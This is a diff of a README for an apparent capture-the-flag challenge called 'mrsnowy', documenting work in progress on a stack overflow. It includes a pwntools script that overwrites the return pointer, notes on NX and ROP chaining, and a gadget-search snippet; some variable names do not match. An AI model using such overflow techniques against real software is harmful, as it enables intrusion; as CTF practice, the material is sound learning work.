update

pwn/mrsnowy/README.md

@@ -8,14 +8,18 @@ Something must be wrong with him.
 
 ## Progress so far
 
-- `read()` reads 0x108 bytes
+![vulnerable function](images/investigate.png)
-- The Stackframe has a size of 0x40 bytes
+
+- The `read()` reads 0x108 bytes of input from stdin
+  - The buffer is uninitialized
+  - The functioncall sits at `*investigate+67`
+- The Stackframe of the function only has a size of 0x40 bytes
 - `checksec --file=mrsnowy` reports NX being enabled
   - So no shellcode will be placable unless there is executable space
   - This hints to ROP Chaining
 - The binary should be patched to get rid of the timetaking animation
-  - Just `nop` the banner() function call
+  - Just `nop` the banner() function call using radare2
-- Overwriting the returnpointer of `investigate()`:
+- Overwriting the returnpointer of `investigate()` using pwntools:
 
 ```python
 context(arch='x86_64', os='linux')
@@ -23,6 +27,7 @@ context.terminal = ['/usr/bin/alacritty', '-e']
 e = ELF("mr_snowy")
 p = process(e.path)
 
+# read banner and stuff until input is requested
 def do_read():
   while True:
      ll = p.read()
@@ -41,3 +46,12 @@ p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
 # start the python debugger to get a coredump which is loadable by gdb
 ipdb.set_trace()
 ```
+
+- Trying to find ROP Gadgets using pwntools
+
+```python
+e = ELF("mr_snowy")
+rop = ROP(elf)
+rop.rbx
+rop.gadgets
+```